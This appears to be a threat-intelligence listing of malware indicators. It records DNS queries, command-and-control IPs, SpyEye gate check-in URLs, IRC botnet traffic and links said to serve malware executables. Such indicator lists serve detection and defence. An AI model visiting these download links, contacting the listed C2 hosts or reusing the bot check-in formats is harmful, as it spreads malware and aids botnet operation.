– DNS Queries: Name Query Type Query Result Successful Protocol darkdosser.redirectme.net DNS_TYPE_A 68.117.95.139 YES udp TCP Traffic: 68.117.95.139:3333 exe file: http://86247b6f.goneviral.com infos about hosting: http://whois.domaintools.com/68.117.95.139
forwardmotionconcepts.com(SpyEye banking trojan hosted in United States Dallas Softlayer Technologies Inc)
Remote Host Port Number 173.192.41.194 80 The data identified by the following URL was then requested from the remote web server: http://forwardmotionconcepts.com/wip5/main/gate.php?guid=UserName!COMPUTERNAME!00CD1A40&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&plg=billinghammer;creditgrab;ftpbc;socks5;USBSpread&cpu=100&ccrc=0D98E50E&md5=fc5531793ca5bebd917e6ef85d709272 SpyEye Panel: http://forwardmotionconcepts.com/wip5/main/ exe file: http://9d0a7f4d.tinylinks.co infos about hosting: http://whois.domaintools.com/173.192.41.194
111.90.139.77(ngrbot hosted in Malaysia Piradius Net)
Remote Host Port Number 111.90.139.77 1863 PASS ngrBot 213.251.170.52 80 NICK n{US|XPa}szcacic USER szcacic 0 0 :szcacic JOIN #IrcPeru PeruRulz!! infos about hosting: http://whois.domaintools.com/111.90.139.77
twtw.toh.info(chinese malware hosted in Hong Kong Nwt Idc Data Service)
Name Query Type Query Result Successful Protocol twtw.toh.info DNS_TYPE_A 58.64.203.53 YES udp – Unknown TCP Traffic: 58.64.203.53:443 State: Connection established, not terminated – Transferred outbound Bytes: 672 – Transferred inbound Bytes: 14657 Data sent: exe file: http://a3dc4d85.theseblogs.com infos about hosting: http://whois.domaintools.com/58.64.203.53
tf122.tefgame.com(Trojan-Downloader.Win32.FraudLoad hosted in United States Dallas Theplanet.com Internet Services Inc)
Name Query Type Query Result Successful Protocol tf122.tefgame.com DNS_TYPE_A 174.122.138.122 YES udp – TCP Connection Attempts: 174.122.138.122:8800 exe file: http://549ff376.megaline.co infos about hosting: http://whois.domaintools.com/174.122.138.122
one.123back.com(botnet hosted in Lithuania Webhosting Collocation Services)
Remote Host Port Number 77.79.6.83 6667 NICK [XP-5771910] NOTICE [XP-5771910] : PING 1303048457 PRIVMSG [XP-5771910] : PING 1303048487 PING 1303048519 USER Tulkarm “” “one.123back.com” :Crack GT [Evolution] -=- Version 4.1 USERHOST [XP-5771910] MODE #Chats NICK :i386[XP]25677 MODE [XP-5771910] +i-x JOIN #KSA# coded.v MODE #KSA# UPDATE: Remote Host Port Number 77.79.6.83 1863 NICK |NeW|-{USA-XP|594283} USER 5942Read more...
205.234.231.54(botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number 205.234.231.54 2345 MODE New[USA|00|P|98932] -ix JOIN #!loco! PONG 22 MOTD PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. infos about hosting: http://whois.domaintools.com/205.234.231.54
70.107.249.167(botnet hosted in United States Whitestone Verizon Online Llc)
Remote Host Port Number 70.107.249.167 7000 NICK SL624232320666 USER kerwvaiajtadgu 0 0 :SL624232320666 USERHOST SL624232320666 MODE SL624232320666 +i JOIN #GL .x. infos about hosting: http://whois.domaintools.com/70.107.249.167
92.241.165.156(botnet hosted in Russian Federation 2×4.ru Network)
Remote Host Port Number 174.37.200.82 80 204.0.5.35 80 216.178.39.11 80 63.135.80.224 80 69.171.224.12 80 92.241.165.156 1234 PASS xxx NICK NEW-[USA|00|P|00429] USER XP-8653 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|00429] -ix JOIN #!nn! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/92.241.165.156
94.249.188.86(botnet hosted in Germany Ghostnet Gmbh)
Remote Host Port Number 94.249.188.86 2345 NICK [USA|00|P|40787] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-2097 * 0 :COMPUTERNAME MODE [USA|00|P|40787] -ix JOIN #!loco! PONG 22 MOTD infos about hosting: http://whois.domaintools.com/94.249.188.86